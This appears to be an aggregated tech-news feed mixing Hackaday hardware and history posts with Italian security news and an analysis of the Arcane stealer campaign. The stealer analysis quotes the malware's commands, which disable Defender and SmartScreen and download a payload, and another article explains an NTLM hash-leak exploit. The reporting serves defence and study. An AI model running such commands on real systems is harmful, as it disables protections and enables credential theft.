The reason behind [Mike Roller]’s build is simple: he wanted to build something smaller than the previous smallest blinky. The 3.2-mm x 2.5-mm footprint of that effort is a tough act to follow, but technology has advanced somewhat in the last seven years, and [Mike] took advantage of that by basing his design on an ATtiny20 microcontroller in a WLCSP package and an 0201 LED, along with a current-limiting resistor and a decoupling capacitor. Powering the project is a 220-μF tantalum capacitor, which at a relatively whopping 3.2 mm x 1.6 mm determines the size of the PCB, which [Mike] insisted on using.
Assembling the project was challenging, to say the least. [Mike] originally tried a laboratory hot plate to reflow the board, but when the magnetic stirrer played havoc with the parts, he switched to a hot-air rework station with a very low airflow. Programming the microcontroller almost seemed like it was more of a challenge; when the pogo pins he was planning to use proved too large for the job he tacked leads made from 38-gauge magnet wire to the board with the aid of a micro hot air tool.
After building version one, [Mike] realized that even smaller components were available, so there’s now a 2.4 mm x 1.5 mm version using an 01005 LED. We suspect there’ll be a version 3.0 soon, though — he mentions that the new TI ultra-small microcontrollers weren’t available yet when he pulled this off, and no doubt he’ll want to take a stab at this again.
Pick Up A Pebble Again
A decade ago, smartwatches were an unexplored avenue full of exotic promise. There were bleeding-edge and eye-wateringly expensive platforms from the likes of Samsung or Apple, but for the more experimental among technophiles there was the Pebble. Based on a microcontroller and with a relatively low-resolution display, it was the subject of a successful crowdfunding campaign and became quite the thing to have. Now long gone, it has survived in open-source form, and now if you’re a Pebble die-hard you can even buy a new Pebble. We’re not sure about their choice of name though, we think calling something the “Core 2 Duo” might attract the attention of Intel’s lawyers.
The idea is broadly the same as the original, and remains compatible with software from back in the day. New are some extra sensors, longer battery life, and an nRF52840 BLE microcontroller running the show. It certainly captures the original well, however we’re left wondering whether a 2013 experience still cuts it in 2025 at that price. We suspect in that vein it would be the ideal compliment to your game controller when playing Grand Theft Auto V, another evergreen 2013 hit.
We look forward to seeing where this goes, and we reported on the OS becoming open source earlier this year. Perhaps someone might produce a piece of open source hardware to do the same job?
Modern Computing’s Roots or The Manchester Baby
In the heart of Manchester, UK, a groundbreaking event took place in 1948: the first modern computer, known as the Manchester Baby, ran its very first program. The Baby’s ability to execute stored programs, developed with guidance from John von Neumann’s theory, marks it as a pioneer in the digital age. This fascinating chapter in computing history not only reshapes our understanding of technology’s roots but also highlights the incredible minds behind it. The original article, including a video transcript, sits here at [TheChipletter]’s.
So, what made this hack so special? The Manchester Baby, though a relatively simple prototype, was the first fully electronic computer to successfully run a program from memory. Built by a team with little formal experience in computing, the Baby featured a unique cathode-ray tube (CRT) as its memory store – a bold step towards modern computing. It didn’t just run numbers; it laid the foundation for all future machines that would use memory to store both data and instructions. Running a test to find the highest factor of a number, the Baby performed 3.5 million operations over 52 minutes. Impressive, by that time.
Despite criticisms that it was just a toy computer, the Baby’s significance shines through. It was more than just a prototype; it was proof of concept for the von Neumann architecture, showing us that computers could be more than complex calculators. While debates continue about whether it or the ENIAC should be considered the first true stored-program computer, the Baby’s role in the evolution of computing can’t be overlooked.
youtube.com/embed/cozcXiSSkwE?…
This M5Stack Game Is Surprisingly Addictive
For those of us lucky enough to have been at Hackaday Europe in Berlin, there was a feast of hacks at our disposal. Among them was [Vladimir Divic]’s gradients game, software for an M5Stack module which was definitely a lot of fun to play. The idea of the game is simple enough, a procedurally generated contour map is displayed on the screen, and the player must navigate a red ball around and collect as many green ones as possible. It’s navigated using the M5Stack’s accelerometer, which is what makes for the engaging gameplay. In particular it takes a moment to discover that the ball can be given momentum, making it something more than a simple case of ball-rolling.
Underneath the hood it’s an Arduino .ino file for the M5Stack’s ESP32, and thus shouldn’t present a particular challenge to most readers. Meanwhile the M5Stack with its versatile range of peripherals has made it onto these pages several times over the years, not least as a LoRA gateway.
FLOSS Weekly Episode 825: Open Source CI With Semaphore
This week, Jonathan Bennett and Ben Meadors talk to Darko Fabijan about Semaphore, the newly Open Sourced Continuous Integration solution! Why go Open, and how has it gone so far? Watch to find out!
- Semaphore Uncut Podcast: semaphore.io/podcast
- Discord: discord.gg/FBuUrV24NH
- youtube.com/c/SemaphoreCI
- Semaphore blog: semaphoreci.com/blog
- Semaphore on X: x.com/semaphoreci
youtube.com/embed/0Ts8sbV6K7A?…
Did you know you can watch the live recording of the show right on our YouTube Channel? Have someone you’d like us to interview? Let us know, or contact the guest and have them contact us! Take a look at the schedule here.
play.libsyn.com/embed/episode/…
Direct Download in DRM-free MP3.
If you’d rather read along, here’s the transcript for this week’s episode.
Places to follow the FLOSS Weekly Podcast:
Theme music: “Newer Wave” Kevin MacLeod (incompetech.com)
Licensed under Creative Commons: By Attribution 4.0 License
hackaday.com/2025/03/19/floss-…
From the Ashes: Coal Ash May Offer Rich Source of Rare Earth Elements
For most of history, the world got along fine without the rare earth elements. We knew they existed, we knew they weren’t really all that rare, and we really didn’t have much use for them — until we discovered just how useful they are and made ourselves absolutely dependent on them, to the point where not having them would literally grind the world to a halt.
This dependency has spurred a search for caches of rare earth elements in the strangest of places, from muddy sediments on the sea floor to asteroids. But there’s one potential source that’s much closer to home: coal ash waste. According to a study from the University of Texas Austin, the 5 gigatonnes of coal ash produced in the United States between 1950 and 2021 might contain as much as $8.4 billion worth of REEYSc — that’s the 16 lanthanide rare earth elements plus yttrium and scandium, transition metals that aren’t strictly rare earths but are geologically associated with them and useful in many of the same ways.
The study finds that about 70% of this coal ash largesse could still be accessible in the landfills and ponds in which it was dumped after being used for electrical generation or other industrial processes; the remainder is locked away in materials like asphalt and concrete, where it was used as a filler. The concentration of REEYSc in ash waste depends on where the coal was mined and ranges from 264 mg/kg for Powder River coal to 431 mg/kg for coal from the Appalachian Basin. Oddly, they find that recovery rates are inversely proportional to the richness of the ash.
The study doesn’t discuss any specific methods for recovery of REEYSc from coal ash at the industrial scale, but it does reference an earlier paper that mentions possible methods we’ve seen before in our Mining and Refining series, including physical beneficiation, which separates the desired minerals from the waste material using properties such as shape, size, or density, and hydrometallurgical methods such as acid leaching or ion exchange. The paper also doesn’t mention how these elements accumulated in the coal ash in the first place, although we assume that Carboniferous-period plants bioaccumulated the minerals before they died and started turning into coal.
Of course, this is just preliminary research, and no attempt has yet been made to commercialize rare earth extraction from coal ash. There are probably serious technical and regulatory hurdles, not least of which would be valid concerns for the environmental impacts of disturbing long-ignored ash piles. On the other hand, the study mentions “mine-mouth” power plants, where mines and generating plants were colocated as possibly the ideal place to exploit since ash was used to backfill the mine works right on the same site.
Falla critica in Esplora file di Windows ruba le password senza interazione dell’utente
Si tratta di un grave bug risolto da Microsoft nel patch tuesday di Marzo che ha visto pubblicato un exploit proof-of-concept (PoC) che dimostra come questa falla di sicurezza può essere sfruttata.
La vulnerabilità è presente in Esplora file di Windows, ed è identificata come CVE-2025-24071, consente agli aggressori di rubare password con hash NTLM senza alcuna interazione da parte dell’utente, se non la semplice estrazione di un file compresso.
La vulnerabilità consente l’esposizione di informazioni sensibili ad attori non autorizzati, consentendo attacchi di spoofing di rete. Un ricercatore di sicurezza con handle 0x6rss ha pubblicato un exploit proof-of-concept su GitHub il 16 marzo 2025. Il PoC include uno script Python che genera il file .library-ms dannoso e può essere utilizzato con un semplice comando: python poc.py
Scopriamo come funziona questo grave bug di sicurezza
La vulnerabilità, denominata “NTLM Hash Leak tramite estrazione RAR/ZIP”, sfrutta il meccanismo di elaborazione automatica dei file di Windows Explorer. Quando un file .library-ms appositamente creato contenente un percorso SMB dannoso viene estratto da un archivio compresso, Windows Explorer ne analizza automaticamente il contenuto per generare anteprime e metadati di indicizzazione.
Questa elaborazione automatica avviene anche se l’utente non apre mai esplicitamente il file estratto. Il formato file .library-ms, basato su XML è considerato affidabile da Windows Explorer. Deinisce le posizioni delle librerie, include un tag che punta a un server SMB controllato dall’aggressore, afferma il ricercatore di sicurezza “0x6rss”.
Durante l’estrazione, Windows Explorer tenta di risolvere automaticamente il percorso SMB incorporato (ad esempio, \\192.168.1.116\shared) per raccogliere i metadati. Questa azione innesca un handshake di autenticazione NTLM dal sistema della vittima al server dell’aggressore, facendo trapelare l’hash NTLMv2 della vittima senza alcuna interazione da parte dell’utente.
Utilizzando Procmon, possiamo osservare chiaramente che subito dopo l’estrazione del file .library-ms , le seguenti operazioni vengono eseguite automaticamente da Explorer.exe e dai servizi di indicizzazione come SearchProtocolHost.exe :
- CreateFile: il file viene aperto automaticamente da Explorer.
- ReadFile: il contenuto del file viene letto per estrarre i metadati.
- QueryBasicInformationFile: query sui metadati eseguite.
- CloseFile: il file viene chiuso dopo l’elaborazione.
Inoltre, SearchProtocolHost.exe viene richiamato come parte del servizio di indicizzazione dei file di Windows. Dopo che Explorer.exe termina la sua elaborazione iniziale, il servizio di indicizzazione riapre e legge il file per indicizzarne il contenuto. Ciò conferma ulteriormente la gestione automatizzata dei file al momento dell’estrazione:
- CreateFile, ReadFile, QueryBasicInformationFile, CloseFile: eseguiti da SearchProtocolHost.exe per aggiungere il contenuto del file all’indice di ricerca.
Queste azioni dimostrano in modo conclusivo che Windows elabora automaticamente i file immediatamente dopo l’estrazione, senza alcuna interazione esplicita da parte dell’utente.
Sia Explorer.exe che SearchProtocolHost.exe leggono ed elaborano automaticamente il contenuto XML del file .library-ms , avviando un tentativo di connessione al percorso SMB incorporato al suo interno.
Sfruttamento della vulnerabilità nei mercati underground
Questa vulnerabilità è attivamente sfruttata dagli attaccanti ed è stata potenzialmente messa in vendita sul forum xss.is dall’autore della minaccia noto come “Krypt0n“. Questo Threat Actors è anche lo sviluppatore del malware denominato “EncryptHub Stealer“
L'articolo Falla critica in Esplora file di Windows ruba le password senza interazione dell’utente proviene da il blog della sicurezza informatica.
Reviving a Maplin 4600 DIY Synthesizer From the 1970s
A piece of musical history is the Maplin 4600, a DIY electronic music synthesizer from the 1970s. The design was published in an Australian electronics magazine and sold as a DIY kit, and [LOOK MUM NO COMPUTER] got his hands on an original Maplin 4600 that he refurbishes and puts through its paces.Inserting conductive pegs is how the operator connects different inputs and outputs.
The Maplin 4600 is a (mostly) analog device with a slightly intimidating-looking layout. It features multiple oscillators, mixers, envelope generators, filters, and a complex-looking patch bay on the right hand side that is reminiscent of a breadboard. By inserting conductive pins, one can make connections between various inputs and outputs.
Internally the different features and circuits are mostly unconnected from one another by default, so the patch board is how the instrument is “programmed” and the connections made can be quite complex. The 4600 is one of a few synthesizer designs by [Trevor Marshall], who has some additional details about on his website.
The video (embedded below) is a complete walk-through of the unit, including its history, quirks, and design features. If you’d like to skip directly to a hands-on demonstrating how it works, that begins around the 10:15 mark.
Synthesizers have a rich DIY history and it’s fascinating to see an in-depth look at this one. And hey, if you like your synths complex and intimidating, do yourself a favor and check out the Starship One.
youtube.com/embed/S-tnRJZBEUk?…
Italia col Botto! Esposti 35 database italiani nell’underground. tra questi anche Giustizia.it
Un recente post apparso sul noto forum underground BreachForums ha rivelato la pubblicazione di un pacchetto contenente 35 database italiani, esponendo informazioni sensibili di utenti e aziende. L’utente “Tanaka”, moderatore della piattaforma, ha condiviso una lista di archivi contenenti dati in formato SQL e CSV, suggerendo la possibile compromissione di diverse realtà, tra cui aziende private e persino entità istituzionali.
Disclaimer: Questo rapporto include screenshot e/o testo tratti da fonti pubblicamente accessibili. Le informazioni fornite hanno esclusivamente finalità di intelligence sulle minacce e di sensibilizzazione sui rischi di cybersecurity. Red Hot Cyber condanna qualsiasi accesso non autorizzato, diffusione impropria o utilizzo illecito di tali dati. Al momento, non è possibile verificare in modo indipendente l’autenticità delle informazioni riportate, poiché le organizzazioni coinvolte non hanno ancora rilasciato un comunicato ufficiale sul proprio sito web. Di conseguenza, questo articolo deve essere considerato esclusivamente a scopo informativo e di intelligence.
Tra le vittime anche siti istituzionali
Uno degli elementi più allarmanti di questa fuga di dati è la presenza nella lista del sito “giustizia.it”, portale istituzionale legato all’amministrazione della giustizia italiana. Se confermata, questa violazione potrebbe avere gravi implicazioni per la sicurezza dei dati giudiziari e delle persone coinvolte.
Oltre a questo, nell’elenco compaiono diverse aziende operanti in vari settori, tra cui il commercio online, il settore immobiliare e la tecnologia. Alcuni file fanno riferimento a database contenenti centinaia di migliaia di utenti, con informazioni che potrebbero includere credenziali di accesso, dati personali e altre informazioni sensibili.
L’importanza di un’analisi mirata
È altamente probabile che questi database siano il risultato di vecchie violazioni, riorganizzati e rivenduti nel mercato underground sotto forma di “collection” di credenziali. Questo fenomeno è comune nel dark web, dove gli attori malevoli combinano dati trapelati nel tempo per creare nuovi “combo list” utilizzabili per attacchi mirati.
Anche se alcune credenziali possono sembrare obsolete, è fondamentale prestare attenzione: molte di esse rimangono valide o vengono riutilizzate dagli utenti su più servizi. La diffusione di queste raccolte può infatti alimentare una nuova ondata di phishing e attacchi credential stuffing, aumentando il rischio per aziende e privati.
Le aziende e le entità citate nel post dovrebbero prendere immediati provvedimenti per verificare l’origine di questi database e comprendere se siano realmente frutto di una violazione diretta o se, invece, derivino da una compromissione indiretta di fornitori terzi o servizi connessi.
Se non hanno evidenza di una precedente intrusione, dovrebbero comunque effettuare un’indagine approfondita per escludere la possibilità di un data breach non ancora identificato. Un monitoraggio continuo e l’adozione di strategie di mitigazione del rischio sono fondamentali per proteggere i dati degli utenti e preservare la propria reputazione.
Un mercato sempre più attivo dei dati trafugati
Il forum BreachForums si è ormai affermato come uno dei principali hub per la vendita e la condivisione di database compromessi. Dopo la chiusura di RaidForums, piattaforma simile, BreachForums è rapidamente diventato il punto di riferimento per i cybercriminali interessati alla compravendita di dati sensibili.
Questa ennesima esposizione di dati italiani sottolinea ancora una volta l’importanza di misure di sicurezza adeguate, aggiornamenti tempestivi dei sistemi e una formazione continua sulla cybersecurity per prevenire future compromissioni.
Cosa fare se si è coinvolti? Le aziende e gli enti presenti nell’elenco dovrebbero:
- Verificare la legittimità della presunta violazione.
- Condurre un audit di sicurezza per individuare eventuali falle nei sistemi.
- Forzare il reset delle credenziali per gli utenti coinvolti.
- Monitorare il dark web per intercettare eventuali tentativi di vendita o abuso dei dati esposti.
In un contesto in cui le fughe di dati sono sempre più frequenti, la prevenzione e la reazione tempestiva restano le migliori strategie di difesa.
L'articolo Italia col Botto! Esposti 35 database italiani nell’underground. tra questi anche Giustizia.it proviene da il blog della sicurezza informatica.
So What is a Supercomputer Anyway?
Over the decades there have been many denominations coined to classify computer systems, usually when they got used in different fields or technological improvements caused significant shifts. While the very first electronic computers were very limited and often not programmable, they would soon morph into something that we’d recognize today as a computer, starting with World War 2’s Colossus and ENIAC, which saw use with cryptanalysis and military weapons programs, respectively.
The first commercial digital electronic computer wouldn’t appear until 1951, however, in the form of the Ferranti Mark 1. These 4.5 ton systems mostly found their way to universities and kin, where they’d find welcome use in engineering, architecture and scientific calculations. This became the focus of new computer systems, effectively the equivalent of a scientific calculator. Until the invention of the transistor, the idea of a computer being anything but a hulking, room-sized monstrosity was preposterous.
A few decades later, more computer power could be crammed into less space than ever before including ever higher density storage. Computers were even found in toys, and amidst a whirlwind of mini-, micro-, super-, home-, minisuper- and mainframe computer systems, one could be excused for asking the question: what even is a supercomputer?
Today’s Supercomputers
ORNL’s Summit supercomputer, fastest until 2020 (Credit: ORNL)
Perhaps a fair way to classify supercomputers is that the ‘supercomputer’ aspect is a highly time-limited property. During the 1940s, Colossus and ENIAC were without question the supercomputers of their era, while 1976’s Cray-1 wiped the floor with everything that came before, yet all of these are archaic curiosities next to today’s top two supercomputers. Both the El Capitan and Frontier supercomputers are exascale (1+ exaFLOPS in double precision IEEE 754 calculations) level machines, based around commodity x86_64 CPUs in a massively parallel configuration.
Taking up 700 m2 of floor space at the Lawrence Livermore National Laboratory (LLNL) and drawing 30 MW of power, El Capitan’s 43,808 AMD EPYC CPUs are paired with the same number of AMD Instinct MI300A accelerators, each containing 24 Zen 4 cores plus CDNA3 GPU and 128 GB of HBM3 RAM. Unlike the monolithic ENIAC, El Capitan’s 11,136 nodes, containing four MI300As each, rely on a number of high-speed interconnects to distribute computing work across all cores.
At LLNL, El Capitan is used for effectively the same top secret government things as ENIAC was, while Frontier at Oak Ridge National Laboratory (ORNL) was the fastest supercomputer before El Capitan came online about three years later. Although currently LLNL and ORNL have the fastest supercomputers, there are many more of these systems in use around the world, even for innocent scientific research.
Looking at the current list of supercomputers, such as today’s Top 9, it’s clear that not only can supercomputers perform a lot more operations per second, they also are invariably massively parallel computing clusters. This wasn’t a change that was made easily, as parallel computing comes with a whole stack of complications and problems.
The Parallel Computing Shift
ILLIAC IV massively parallel computer’s Control Unit (CU). (Credit: Steve Jurvetson, Wikimedia)
The first massively parallel computer was the ILLIAC IV, conceptualized by Daniel Slotnick in 1952 and first successfully put into operation in 1975 when it was connected to ARPANET. Although only one quadrant was fully constructed, it produced 50 MFLOPS compared to the Cray-1’s 160 MFLOPS a year later. Despite the immense construction costs and spotty operational history, it provided a most useful testbed for developing parallel computation methods and algorithms until the system was decommissioned in 1981.
There was a lot of pushback against the idea of massively parallel computation, however, with Seymour Cray famously comparing the idea of using many parallel vector processors instead of a single large one akin to ‘plowing a field with 1024 chickens instead of two oxen’.
Ultimately there is only so far you can scale a singular vector processor, of course, while parallel computing promised much better scaling, as well as the use of commodity hardware. A good example of this is a so-called Beowulf cluster, named after the original 1994 parallel computer built by Thomas Sterling and Donald Becker at NASA. This can use plain desktop computers, wired together using for example Ethernet and with open source libraries like Open MPI enabling massively parallel computing without a lot of effort.
Not only does this approach enable the assembly of a ‘supercomputer’ using cheap-ish, off-the-shelf components, it’s also effectively the approach used for LLNL’s El Capitan, just with not very cheap hardware, and not very cheap interconnect hardware, but still cheaper than if one were to try to build a monolithic vector processor with the same raw processing power after taking the messaging overhead of a cluster into account.
Mini And Maxi
David Lovett of Usagi Electric fame sitting among his FPS minisupercomputer hardware. (Credit: David Lovett, YouTube)
One way to look at supercomputers is that it’s not about the scale, but what you do with it. Much like how government, large businesses and universities would end up with ‘Big Iron’ in the form of mainframes and supercomputers, there was a big market for minicomputers too. Here ‘mini’ meant something like a PDP-11 that’d comfortably fit in the corner of an average room at an office or university.
The high-end versions of minicomputers were called ‘superminicomputer‘, which is not to be confused with minisupercomputer, which is another class entirely. During the 1980s there was a brief surge in this latter class of supercomputers that were designed to bring solid vector computing and similar supercomputer feats down to a size and price tag that might entice departments and other customers who’d otherwise not even begin to consider such an investment.
The manufacturers of these ‘budget-sized supercomputers’ were generally not the typical big computer manufacturers, but instead smaller companies and start-ups like Floating Point Systems (later acquired by Cray) who sold array processors and similar parallel, vector computing hardware.
Recently David Lovett (AKA Mr. Usagi Electric) embarked on a quest to recover and reverse-engineer as much FPS hardware as possible, with one of the goals being to build a full minisupercomputer system as companies and universities might have used them in the 1980s. This would involve attaching such an array processor to a PDP-11/44 system.
Speed Versus Reliability
Amidst all of these definitions, the distinction between a mainframe and a supercomputer is much easier and more straightforward at least. A mainframe is a computer system that’s designed for bulk data processing with as much built-in reliability and redundancy as the price tag allows for. A modern example is IBM’s Z-series of mainframes, with the ‘Z’ standing for ‘zero downtime’. These kind of systems are used by financial institutions and anywhere else where downtime is counted in millions of dollars going up in (literal) flames every second.
This means hot-swappable processor modules, hot-swappable and redundant power supplies, not to mention hot spares and a strong focus on fault tolerant computing. All of these features are less relevant for a supercomputer, where raw performance is the defining factor when running days-long simulations and when other ways to detect flaws exist without requiring hardware-level redundancy.
Considering the brief lifespan of supercomputers (currently in the order of a few years) compared to mainframes (decades) and the many years that the microcomputers which we have on our desks can last, the life of a supercomputer seems like that of a bright and very brief flame, indeed.
Top image: Marlyn Wescoff and Betty Jean Jennings configuring plugboards on the ENIAC computer (Source: US National Archives)
Make Fancy Resin Printer 3D Models FDM-Friendly
Do you like high-detail 3D models intended for resin printing, but wish you could more easily print them on a filament-based FDM printer? Good news, because [Jacob] of Painted4Combat shared a tool he created to make 3D models meant for resin printers — the kind popular with tabletop gamers — easier to port to FDM. It comes in the form of a Blender add-on called Resin2FDM. Intrigued, but wary of your own lack of experience with Blender? No problem, because he also made a video that walks you through the whole thing step-by-step.Resin2FDM separates the model from the support structure, then converts the support structure to be FDM-friendly.
3D models intended for resin printing aren’t actually any different, format-wise, from models intended for FDM printers. The differences all come down to the features of the model and how well the printer can execute them. Resin printing is very different from FDM, so printing a model on the “wrong” type of printer will often have disappointing results. Let’s look at why that is, to better understand what makes [Jacob]’s tool so useful.
Rafts and a forest of thin tree-like supports are common in resin printing. In the tabletop gaming scene, many models come pre-supported for convenience. A fair bit of work goes into optimizing the orientation of everything for best printed results, but the benefits don’t carry directly over to FDM.
For one thing, supports for resin prints are usually too small for an FDM printer to properly execute — they tend to be very thin and very tall, which is probably the least favorable shape for FDM printing. In addition, contact points where each support tapers down to a small point that connects to the model are especially troublesome; FDM slicer software will often simply consider those features too small to bother trying to print. Supports that work on a resin printer tend to be too small or too weak to be effective on FDM, even with a 0.2 mm nozzle.
To solve this, [Jacob]’s tool allows one to separate the model itself from the support structure. Once that is done, the tool further allows one to tweak the nest of supports, thickening them up just enough to successfully print on an FDM printer, while leaving the main model unchanged. The result is a support structure that prints well via FDM, allowing the model itself to come out nicely, with a minimum of alterations to the original.
Resin2FDM is available in two versions, the Lite version is free and an advanced version with more features is available to [Jacob]’s Patreon subscribers. The video (embedded below) covers everything from installation to use, and includes some general tips for best results. Check it out if you’re interested in how [Jacob] solved this problem, and keep it in mind for the next time you run across a pre-supported model intended for resin printing that you wish you could print with FDM.
youtube.com/embed/zZp-CLhH1Ao?…
Arcane stealer: We want all your data
At the end of 2024, we discovered a new stealer distributed via YouTube videos promoting game cheats. What’s intriguing about this malware is how much it collects. It grabs account information from VPN and gaming clients, and all kinds of network utilities like ngrok, Playit, Cyberduck, FileZilla and DynDNS. The stealer was named Arcane, not to be confused with the well-known Arcane Stealer V. The malicious actor behind Arcane went on to release a similarly named loader, which supposedly downloads cheats and cracks, but in reality delivers malware to the victim’s device.
Distribution
The campaign in which we discovered the new stealer was already active before Arcane appeared. The original distribution method started with YouTube videos promoting game cheats. The videos were frequently accompanied by a link to an archive and a password to unlock it. Upon unpacking the archive, the user would invariably discover a start.bat batch file in the root folder and the UnRAR.exe utility in one of the subfolders.
Contents of the “natives” subfolder
The contents of the batch file were obfuscated. Its only purpose was to download another password-protected archive via PowerShell, and unpack that with UnRAR.exe with the password embedded in the BATCH file as an argument.
Contents of the obfuscated start.bat file
Following that, start.bat would use PowerShell to launch the executable files from the archive. While doing so, it added every drive root folder to SmartScreen filter exceptions. It then reset the EnableWebContentEvaluation and SmartScreenEnabled registry keys via the system console utility reg.exe to disable SmartScreen altogether.
powershell -Command "Get-PSDrive -PSProvider FileSystem | ForEach-Object {Add-MpPreference -ExclusionPath $_.Root}"
reg add "HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\AppHost" /v "EnableWebContentEvaluation" /t REG_DWORD /d 0 /f
reg add "HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer" /v "SmartScreenEnabled" /t REG_SZ /d "Off" /f
powershell -Command "(New-Object Net.WebClient).DownloadString(\'https://pastebin.com/raw/<redacted>\')"
powershell -Command "(New-Object Net.WebClient).DownloadFile(\'https://www.dropbox.com/scl/fi/<redacted>/black.rar?rlkey=<redacted>&st=<redacted>&dl=1\', \'C:\\Users\\<redacted>\\AppData\\Local\\Temp\\black.rar\')"
Key commands run by start.bat
The archive would always contain two executables: a miner and a stealer.
Contents of the downloaded archive
The stealer was a Phemedrone Trojan variant, rebranded by the attackers as “VGS”. They used this name in the logo, which, when generating stealer activity reports, is written to the beginning of the file along with the date and time of the report’s creation.
Arcane replaces VGS
At the end of 2024, we discovered a new Arcane stealer distributed as part of the same campaign. It is worth noting that a stealer with a similar name has been encountered before: a Trojan named “Arcane Stealer V” was offered on the dark web in 2019, but it shares little with our find. The new stealer takes its name from the ASCII art in the code.
Arcane succeeded VGS in November. Although much of it was borrowed from other stealers, we could not attribute it to any of the known families.
Arcane gets regular updates, so its code and capabilities change from version to version. We will describe the common functionality present in various modifications and builds. In addition to logins, passwords, credit card data, tokens and other credentials from various Chromium and Gecko-based browsers, Arcane steals configuration files, settings and account information from the following applications:
- VPN clients: OpenVPN, Mullvad, NordVPN, IPVanish, Surfshark, Proton, hidemy.name, PIA, CyberGhost, ExpressVPN
- Network clients and utilities: ngrok, Playit, Cyberduck, FileZilla, DynDNS
- Messaging apps: ICQ, Tox, Skype, Pidgin, Signal, Element, Discord, Telegram, Jabber, Viber
- Email clients: Outlook
- Gaming clients and services: Riot Client, Epic, Steam, Ubisoft Connect (ex-Uplay), Roblox, Battle.net, various Minecraft clients
- Crypto wallets: Zcash, Armory, Bytecoin, Jaxx, Exodus, Ethereum, Electrum, Atomic, Guarda, Coinomi
In addition, the stealer collects all kinds of system information, such as the OS version and installation date, digital key for system activation and license verification, username and computer name, location, information about the CPU, memory, graphics card, drives, network and USB devices, and installed antimalware and browsers. Arcane also takes screenshots of the infected device, obtains lists of running processes and Wi-Fi networks saved in the OS, and retrieves the passwords for those networks.
Arcane’s functionality for stealing data from browsers warrants special attention. Most browsers generate unique keys for encrypting sensitive data they store, such as logins, passwords, cookies, etc. Arcane uses the Data Protection API (DPAPI) to obtain these keys, which is typical of stealers. But Arcane also contains an executable file of the Xaitax utility, which it uses to crack browser keys. To do this, the utility is dropped to disk and launched covertly, and the stealer obtains all the keys it needs from its console output.
The stealer implements an additional method for extracting cookies from Chromium-based browsers through a debug port. The Trojan secretly launches a copy of the browser with the “remote-debugging-port” argument, then connects to the debug port, issues commands to visit several sites, and requests their cookies. The list of resources it visits is provided below.
- gmail.com,
- drive.google.com,
- photos.google.com,
- mail.ru,
- rambler.ru,
- steamcommunity.com,
- youtube.com,
- avito.ru,
- ozon.ru,
- twitter.com,
- roblox.com,
- passport.yandex.ru
ArcanaLoader
Within a few months of discovering the stealer, we noticed a new distribution pattern. Rather than promoting cheats, the threat actors shifted to advertising ArcanaLoader on their YouTube channels. This is a loader with a graphical user interface for downloading and running the most popular cracks, cheats and other similar software. More often than not, the links in the videos led to an executable file that downloaded an archive with ArcanaLoader.
See translation
Читы | Cheats |
Настройки | Settings |
Клиенты с читами | Clients with cheats |
Все версии | All versions |
Введите название чита | Enter cheat name |
Версия: 1.16.5 | Version: 1.16.5 |
Запустить | Start |
Версия: Все Версии | Version: All versions |
The loader itself included a link to the developers’ Discord server, which featured channels for news, support and links to download new versions.
See translation
You have been invited to Arcana Loader
548 online
3,156 users
Accept invitation
At the same time, one of the Discord channels posted an ad, looking for bloggers to promote ArcanaLoader.
Looking for bloggers to spread the loader
See translation
ArcanaLoader BOT
Form:
1. Total subscribers
2. Average views per week
3. Link to ArcanaLoader video
4. Screenshot proof of channel ownership
YOUTUBE
Criteria:
1. 600* subscribers
2. 1,500+ views
3. Links to 2 Arcana Loader videos
Permissions:
1. Send your videos to the #MEDIA chat
2. Personal server role
3. Add cheat to loader without delay
4. Access to @everyone in the #MEDIA chat
5. Possible compensation in rubles for high traffic
MEDIA
Criteria:
1. 50+ subscribers
2. 150+ views
3. Link to 1 ArcanaLoader video
Permissions:
1. Send your videos to the #MEDIA chat
2. Personal server role
Sadly, the main ArcanaLoader executable contained the aforementioned Arcane stealer.
Victims
All conversations on the Discord server are in Russian, the language used in the news channels and YouTube videos. Apparently, the attackers target a Russian-speaking audience. Our telemetry confirms this assumption: most of the attacked users were in Russia, Belarus and Kazakhstan.
Takeaways
Attackers have been using cheats and cracks as a popular trick to spread all sorts of malware for years, and they’ll probably keep doing so. What’s interesting about this particular campaign is that it illustrates how flexible cybercriminals are, always updating their tools and the methods of distributing them. Besides, the Arcane stealer itself is fascinating because of all the different data it collects and the tricks it uses to extract the information the attackers want. To stay safe from these threats, we suggest being wary of ads for shady software like cheats and cracks, avoiding links from unfamiliar bloggers, and using strong security software to detect and disarm rapidly evolving malware.
“Glasses” That Transcribe Text To Audio
Glasses for the blind might sound like an odd idea, given the traditional purpose of glasses and the issue of vision impairment. However, eighth-grade student [Akhil Nagori] built these glasses with an alternate purpose in mind. They’re not really for seeing. Instead, they’re outfitted with hardware to capture text and read it aloud.
Yes, we’re talking about real-time text-to-audio transcription, built into a head-worn format. The hardware is pretty straightforward: a Raspberry Pi Zero 2W runs off a battery and is outfitted with the usual first-party camera. The camera is mounted on a set of eyeglass frames so that it points at whatever the wearer might be “looking” at. At the push of a button, the camera captures an image, and then passes it to an API which does the optical character recognition. The text can then be passed to a speech synthesizer so it can be read aloud to the wearer.
It’s funny to think about how advanced this project really is. Jump back to the dawn of the microcomputer era, and such a device would have been a total flight of fancy—something a researcher might make a PhD and career out of. Indeed, OCR and speech synthesis alone were challenge enough. Today, you can stand on the shoulders of giants and include such mighty capability in a homebrewed device that cost less than $50 to assemble. It’s a neat project, too, and one that we’re sure taught [Akhil] many valuable skills along the way.
youtube.com/embed/ApshHWClGoI?…
8 Anni di Sfruttamento! Il Bug 0day su Microsoft Windows Che Ha Alimentato 11 Gruppi APT
Il team di threat hunting di Trend Zero Day Initiative™ (ZDI) ha identificato casi significativi di sfruttamento di un bug di sicurezza in una serie di campagne risalenti al 2017. L’analisi ha rivelato che 11 gruppi sponsorizzati da stati provenienti da Corea del Nord, Iran, Russia e Cina hanno impiegato il bug monitorato con il codice ZDI-CAN-25373 in operazioni motivate principalmente da cyber spionaggio e furto di dati.
Trendmicro ha scoperto quasi mille campioni Shell Link (.lnk) che sfruttano ZDI-CAN-25373; tuttavia, è probabile che il numero totale di tentativi di sfruttamento sia molto più alto. Successivamente, i ricercatori hanno inviato un exploit proof-of-concept tramite il programma bug bounty di Trend ZDI a Microsoft, che ha rifiutato di risolvere questa vulnerabilità con una patch di sicurezza.
Numero di campioni da gruppi APT che sfruttano ZDI-CAN-25373 (fonte TrendMicro)
